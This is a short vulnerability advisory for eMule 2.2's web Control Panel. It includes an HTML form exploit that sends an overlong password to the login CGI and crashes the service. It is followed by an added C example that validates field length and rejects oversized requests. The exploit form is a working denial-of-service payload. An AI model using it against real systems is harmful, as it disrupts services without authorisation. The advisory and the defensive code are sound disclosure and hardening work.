eMule is "a new filesharing client which is based on the eDonkey2000 network, but offers more features than the standard eDonkey client, because it's open source but under the restrictions of the GPL License".
A vulnerability in eMule's web-based Control Panel allows remote attackers to cause a denial of service against the product.
Credit:
The information has been provided by The-Insider.
Vulnerable systems:
* eMule version 2.2 [0.29c]
By posting a request with a very long arbitrary password to the "login" CGI, it is possible to cause a denial of service against eMule (NOTE: The Control Panel is not enabled by default).
Exploit:
Adding after this line:
<form action="" method="POST" name="login">
This:
<input type="password" name=p size=37 value="a[multiple 'a']a">
<input type="hidden" name=w value="password">
<br>
<br>
<input type=submit value="Login Now"></font>
</form>
Will allow you to trigger the bug.
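The advisory does not describe the root cause inside eMule, but the trigger is an unbounded value in the login form's p field, so a handler can refuse such a request before processing it. The following is an added example, not code from eMule or from the advisory: get_field, oversized_sample_status and the 64-byte MAX_FIELD cap are assumptions made for illustration, and the sample request bodies are constructed.

```c
#include <stdio.h>
#include <string.h>

#define MAX_FIELD 64 /* assumed cap for this example, not an eMule value */
enum { FIELD_OK = 0, FIELD_MISSING = -1, FIELD_TOO_LONG = -2 };

/* Copy the raw (still URL-encoded) value of `name` from a form-urlencoded
 * POST body into out[out_sz]; the length is checked before any copy. */
int get_field(const char *body, size_t body_len, const char *name,
              char *out, size_t out_sz)
{
    size_t name_len = strlen(name), pos = 0;
    while (pos < body_len) {
        const char *pair = body + pos;
        const char *amp = memchr(pair, '&', body_len - pos);
        size_t pair_len = amp ? (size_t)(amp - pair) : body_len - pos;
        if (pair_len > name_len && pair[name_len] == '=' &&
            memcmp(pair, name, name_len) == 0) {
            size_t val_len = pair_len - name_len - 1;
            if (val_len >= out_sz)
                return FIELD_TOO_LONG; /* reject, never truncate or overrun */
            memcpy(out, pair + name_len + 1, val_len);
            out[val_len] = '\0';
            return FIELD_OK;
        }
        pos += pair_len + 1; /* skip this pair and its '&' */
    }
    return FIELD_MISSING;
}

/* Constructed sample: login body whose p field is 4096 bytes long. */
int oversized_sample_status(void)
{
    static char body[4200];
    char p[MAX_FIELD];
    memcpy(body, "p=", 2);
    memset(body + 2, 'a', 4096);
    memcpy(body + 4098, "&w=password", sizeof "&w=password");
    return get_field(body, strlen(body), "p", p, sizeof p);
}

int main(void)
{
    char w[MAX_FIELD];
    const char *ok = "p=secret&w=password"; /* constructed normal login */
    printf("normal=%d oversized=%d\n",
           get_field(ok, strlen(ok), "w", w, sizeof w), oversized_sample_status());
    return 0;
}
```

A caller that receives FIELD_TOO_LONG should answer with an error response and drop the request rather than pass the body on to the login logic.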